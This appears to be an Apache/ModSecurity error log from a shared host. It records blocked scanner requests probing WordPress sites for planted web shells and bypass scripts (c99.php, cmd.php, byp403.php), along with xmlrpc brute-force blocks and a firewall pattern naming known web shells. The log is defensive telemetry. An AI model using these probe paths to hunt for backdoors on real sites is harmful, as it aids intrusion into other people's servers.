[Tue May 26 13:12:34.444237 2026] [security2:error] [pid 496740:tid 496972] [client 172.225.181.89:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVO6uvOeft4ltnLrH47bwAAAGY"]
[Tue May 26 13:12:34.636602 2026] [security2:error] [pid 496740:tid 496918] [client 108.136.131.13:49868] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/black.php"] [unique_id "ahVO6uvOeft4ltnLrH47gQAAADA"]
[Tue May 26 13:12:34.641385 2026] [security2:error] [pid 496740:tid 496908] [client 108.136.131.13:49869] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/blog/wp-includes/fonts/dev.php"] [unique_id "ahVO6uvOeft4ltnLrH47ggAAACY"]
[Tue May 26 13:12:34.643801 2026] [security2:error] [pid 496740:tid 496941] [client 108.136.131.13:49876] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/by.php"] [unique_id "ahVO6uvOeft4ltnLrH47gwAAAEc"]
[Tue May 26 13:12:34.645086 2026] [security2:error] [pid 496740:tid 496883] [client 71.121.156.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVO6uvOeft4ltnLrH47agAAAA0"]
[Tue May 26 13:12:34.646154 2026] [security2:error] [pid 496740:tid 496921] [client 108.136.131.13:49870] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/blog/wp-includes/fonts/iqb.php"] [unique_id "ahVO6uvOeft4ltnLrH47hAAAADM"]
[Tue May 26 13:12:34.647403 2026] [security2:error] [pid 496740:tid 496951] [client 108.136.131.13:49882] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/byp.php"] [unique_id "ahVO6uvOeft4ltnLrH47hQAAAFE"]
[Tue May 26 13:12:35.074890 2026] [security2:error] [pid 496740:tid 496975] [client 108.136.131.13:50323] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-includes/install.php"] [unique_id "ahVO6-vOeft4ltnLrH47mQAAAGk"]
[Tue May 26 13:12:35.076236 2026] [security2:error] [pid 496740:tid 496881] [client 108.136.131.13:50453] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-includes/sitemaps/providers/zmFM.php"] [unique_id "ahVO6-vOeft4ltnLrH47mgAAAAs"]
[Tue May 26 13:12:35.081071 2026] [security2:error] [pid 496740:tid 496880] [client 108.136.131.13:50324] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/.well-known/acme-challenge/zmFM.php"] [unique_id "ahVO6-vOeft4ltnLrH47mwAAAAo"]
[Tue May 26 13:12:35.094735 2026] [security2:error] [pid 496740:tid 496990] [client 108.136.131.13:50315] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-content/install.php"] [unique_id "ahVO6-vOeft4ltnLrH47nAAAAHg"]
[Tue May 26 13:12:35.110545 2026] [security2:error] [pid 496740:tid 496899] [client 108.136.131.13:50318] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-admin/user/about.php"] [unique_id "ahVO6-vOeft4ltnLrH47nQAAAB0"]
[Tue May 26 13:12:35.116829 2026] [security2:error] [pid 496740:tid 496870] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVO6uvOeft4ltnLrH47iwAAAAA"]
[Tue May 26 13:12:35.537116 2026] [security2:error] [pid 496740:tid 496887] [client 108.136.131.13:50938] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-admin/css/colors/ectoplasm/zmFM.php"] [unique_id "ahVO6-vOeft4ltnLrH47sgAAABE"]
[Tue May 26 13:12:35.537190 2026] [security2:error] [pid 496740:tid 496923] [client 108.136.131.13:50942] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-includes/certificates/zmFM.php"] [unique_id "ahVO6-vOeft4ltnLrH47swAAADU"]
[Tue May 26 13:12:35.539645 2026] [security2:error] [pid 496740:tid 496928] [client 108.136.131.13:50941] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-includes/customize/zmFM.php"] [unique_id "ahVO6-vOeft4ltnLrH47tQAAADo"]
[Tue May 26 13:12:35.544110 2026] [security2:error] [pid 496740:tid 496894] [client 108.136.131.13:50939] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-includes/PHPMailer/zmFM.php"] [unique_id "ahVO6-vOeft4ltnLrH47twAAABg"]
[Tue May 26 13:12:35.547960 2026] [security2:error] [pid 496740:tid 496874] [client 108.136.131.13:50935] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-includes/pomo/zmFM.php"] [unique_id "ahVO6-vOeft4ltnLrH47ugAAAAQ"]
[Tue May 26 13:12:35.930147 2026] [security2:error] [pid 496740:tid 496907] [client 172.226.42.181:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVO6-vOeft4ltnLrH47yQAAACU"]
[Tue May 26 13:12:35.973825 2026] [security2:error] [pid 496740:tid 496984] [client 108.136.131.13:51155] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-admin/images/admin.php"] [unique_id "ahVO6-vOeft4ltnLrH472gAAAHI"]
[Tue May 26 13:12:35.978465 2026] [security2:error] [pid 496740:tid 496931] [client 108.136.131.13:51159] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-admin/images/index.php"] [unique_id "ahVO6-vOeft4ltnLrH473AAAAD0"]
[Tue May 26 13:12:35.983257 2026] [security2:error] [pid 496740:tid 496966] [client 108.136.131.13:51156] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-admin/network/index.php"] [unique_id "ahVO6-vOeft4ltnLrH473QAAAGA"]
[Tue May 26 13:12:35.990738 2026] [security2:error] [pid 496740:tid 496919] [client 108.136.131.13:51162] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-includes/theme-compat/zmFM.php"] [unique_id "ahVO6-vOeft4ltnLrH473gAAADE"]
[Tue May 26 13:12:35.991341 2026] [security2:error] [pid 496740:tid 496961] [client 108.136.131.13:51157] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-admin/js/index.php"] [unique_id "ahVO6-vOeft4ltnLrH473wAAAFs"]
[Tue May 26 13:12:36.417972 2026] [security2:error] [pid 496740:tid 496871] [client 108.136.131.13:51592] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-includes/SimplePie/Content/Type/index.php"] [unique_id "ahVO7OvOeft4ltnLrH479QAAAAE"]
[Tue May 26 13:12:36.422913 2026] [security2:error] [pid 496740:tid 496959] [client 108.136.131.13:51591] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-admin/css/index.php"] [unique_id "ahVO7OvOeft4ltnLrH479wAAAFk"]
[Tue May 26 13:12:36.423213 2026] [security2:error] [pid 496740:tid 496967] [client 108.136.131.13:51597] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-content/languages/index.php"] [unique_id "ahVO7OvOeft4ltnLrH47-AAAAGE"]
[Tue May 26 13:12:36.423341 2026] [security2:error] [pid 496740:tid 496887] [client 108.136.131.13:51593] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-includes/Requests/Auth/index.php"] [unique_id "ahVO7OvOeft4ltnLrH47-QAAABE"]
[Tue May 26 13:12:36.426239 2026] [security2:error] [pid 496740:tid 496923] [client 108.136.131.13:51594] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-admin/css/colors/index.php"] [unique_id "ahVO7OvOeft4ltnLrH47-gAAADU"]
[Tue May 26 13:12:36.612802 2026] [security2:error] [pid 496740:tid 496928] [client 35.225.27.250:54033] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 250.27.225.35.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.lifestylemne.me"] [uri "/xmlrpc.php"] [unique_id "ahVO7OvOeft4ltnLrH47-wAAADo"]
[Tue May 26 13:12:36.612888 2026] [security2:error] [pid 496740:tid 496928] [client 35.225.27.250:54033] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "www.lifestylemne.me"] [uri "/xmlrpc.php"] [unique_id "ahVO7OvOeft4ltnLrH47-wAAADo"]
[Tue May 26 13:12:36.633923 2026] [security2:error] [pid 496740:tid 496935] [client 35.225.27.250:54953] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 250.27.225.35.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.lifestylemne.me"] [uri "/xmlrpc.php"] [unique_id "ahVO7OvOeft4ltnLrH47_gAAAEE"]
[Tue May 26 13:12:36.634026 2026] [security2:error] [pid 496740:tid 496935] [client 35.225.27.250:54953] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "www.lifestylemne.me"] [uri "/xmlrpc.php"] [unique_id "ahVO7OvOeft4ltnLrH47_gAAAEE"]
[Tue May 26 13:12:36.855834 2026] [security2:error] [pid 496740:tid 496997] [client 108.136.131.13:51678] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-admin/maint/atomlib.php"] [unique_id "ahVO7OvOeft4ltnLrH48EwAAAH8"]
[Tue May 26 13:12:36.862954 2026] [security2:error] [pid 496740:tid 496995] [client 108.136.131.13:51667] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-content/upgrade/index.php"] [unique_id "ahVO7OvOeft4ltnLrH48FQAAAH0"]
[Tue May 26 13:12:36.866876 2026] [security2:error] [pid 496740:tid 496875] [client 108.136.131.13:51683] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-content/plugins/index.php"] [unique_id "ahVO7OvOeft4ltnLrH48FwAAAAU"]
[Tue May 26 13:12:36.868144 2026] [security2:error] [pid 496740:tid 496956] [client 108.136.131.13:51671] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-admin/network/admin.php"] [unique_id "ahVO7OvOeft4ltnLrH48GAAAAFY"]
[Tue May 26 13:12:36.881908 2026] [security2:error] [pid 496740:tid 496974] [client 108.136.131.13:51668] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-content/IXR/index.php"] [unique_id "ahVO7OvOeft4ltnLrH48GQAAAGg"]
[Tue May 26 13:12:37.303788 2026] [security2:error] [pid 496740:tid 496983] [client 108.136.131.13:52360] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/bypas.php"] [unique_id "ahVO7evOeft4ltnLrH48LwAAAHE"]
[Tue May 26 13:12:37.304316 2026] [security2:error] [pid 496740:tid 496963] [client 108.136.131.13:52349] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/byp403.php"] [unique_id "ahVO7evOeft4ltnLrH48MAAAAF0"]
[Tue May 26 13:12:37.316498 2026] [security2:error] [pid 496740:tid 496976] [client 108.136.131.13:52361] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/bypass.php"] [unique_id "ahVO7evOeft4ltnLrH48MQAAAGo"]
[Tue May 26 13:12:37.318187 2026] [security2:error] [pid 496740:tid 496924] [client 108.136.131.13:52362] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-content/uploads/index.php"] [unique_id "ahVO7evOeft4ltnLrH48MwAAADY"]
[Tue May 26 13:12:37.323497 2026] [security2:error] [pid 496740:tid 496882] [client 108.136.131.13:52358] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/byp7.php"] [unique_id "ahVO7evOeft4ltnLrH48NAAAAAw"]
[Tue May 26 13:12:37.520256 2026] [security2:error] [pid 496740:tid 496954] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVO7evOeft4ltnLrH48JgAAAFQ"]
[Tue May 26 13:12:37.523759 2026] [autoindex:error] [pid 496740:tid 496913] [client 207.241.173.38:43836] AH01276: Cannot serve directory /home2/besglde8/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:12:37.746335 2026] [security2:error] [pid 496740:tid 496946] [client 108.136.131.13:53084] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/cgi-bin/index.php"] [unique_id "ahVO7evOeft4ltnLrH48SAAAAEw"]
[Tue May 26 13:12:37.746895 2026] [security2:error] [pid 496740:tid 496892] [client 108.136.131.13:53083] ModSecurity: Access denied with connection close (phase 1). Pattern match "c99\\\\.php|r57shell\\\\.php|r57\\\\.php|c99\\\\.txt" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1164"] [id "900010"] [rev "1"] [msg "c99 variant "] [severity "CRITICAL"] [hostname "agsnails.com"] [uri "/c99.php"] [unique_id "ahVO7evOeft4ltnLrH48SQAAABY"]
[Tue May 26 13:12:37.750419 2026] [security2:error] [pid 496740:tid 496873] [client 108.136.131.13:53082] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/c.php"] [unique_id "ahVO7evOeft4ltnLrH48TAAAAAM"]
[Tue May 26 13:12:37.753529 2026] [security2:error] [pid 496740:tid 496906] [client 108.136.131.13:53085] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/cgi.php"] [unique_id "ahVO7evOeft4ltnLrH48TQAAACQ"]
[Tue May 26 13:12:37.760539 2026] [security2:error] [pid 496740:tid 496997] [client 108.136.131.13:53075] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/byps.php"] [unique_id "ahVO7evOeft4ltnLrH48TwAAAH8"]
[Tue May 26 13:12:38.192304 2026] [security2:error] [pid 496740:tid 496942] [client 108.136.131.13:53993] ModSecurity: Access denied with connection close (phase 1). Pattern match "c99\\\\.php|r57shell\\\\.php|r57\\\\.php|c99\\\\.txt" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1164"] [id "900010"] [rev "1"] [msg "c99 variant "] [severity "CRITICAL"] [hostname "agsnails.com"] [uri "/c99.php"] [unique_id "ahVO7uvOeft4ltnLrH48ZgAAAEg"]
[Tue May 26 13:12:38.240659 2026] [autoindex:error] [pid 496740:tid 496901] [client 207.241.173.38:16362] AH01276: Cannot serve directory /home2/besglde8/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:12:38.595132 2026] [security2:error] [pid 496740:tid 496805] [remote 74.7.241.58:43704] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVO7uvOeft4ltnLrH48cwAAbEA"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/www/shop/wp-content/plugins/yith-woocommerce-wishlist/plugin-fw/lib
[Tue May 26 13:12:38.615409 2026] [security2:error] [pid 496740:tid 496894] [client 108.136.131.13:54913] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/compat.php"] [unique_id "ahVO7uvOeft4ltnLrH48dQAAABg"]
[Tue May 26 13:12:38.633525 2026] [security2:error] [pid 496740:tid 496940] [client 108.136.131.13:54915] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/con.php"] [unique_id "ahVO7uvOeft4ltnLrH48dgAAAEY"]
[Tue May 26 13:12:38.634344 2026] [security2:error] [pid 496740:tid 496896] [client 108.136.131.13:54910] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/chosen.php"] [unique_id "ahVO7uvOeft4ltnLrH48dwAAABo"]
[Tue May 26 13:12:38.637687 2026] [security2:error] [pid 496740:tid 496904] [client 108.136.131.13:54908] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/chosen.php"] [unique_id "ahVO7uvOeft4ltnLrH48eAAAACI"]
[Tue May 26 13:12:38.639464 2026] [security2:error] [pid 496740:tid 496957] [client 108.136.131.13:54911] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/cmd.php"] [unique_id "ahVO7uvOeft4ltnLrH48eQAAAFc"]
[Tue May 26 13:12:39.065521 2026] [security2:error] [pid 496740:tid 496892] [client 108.136.131.13:55595] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/cong.php"] [unique_id "ahVO7-vOeft4ltnLrH48iwAAABY"]
[Tue May 26 13:12:39.076428 2026] [security2:error] [pid 496740:tid 496888] [client 108.136.131.13:55593] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/css.php"] [unique_id "ahVO7-vOeft4ltnLrH48jwAAABI"]
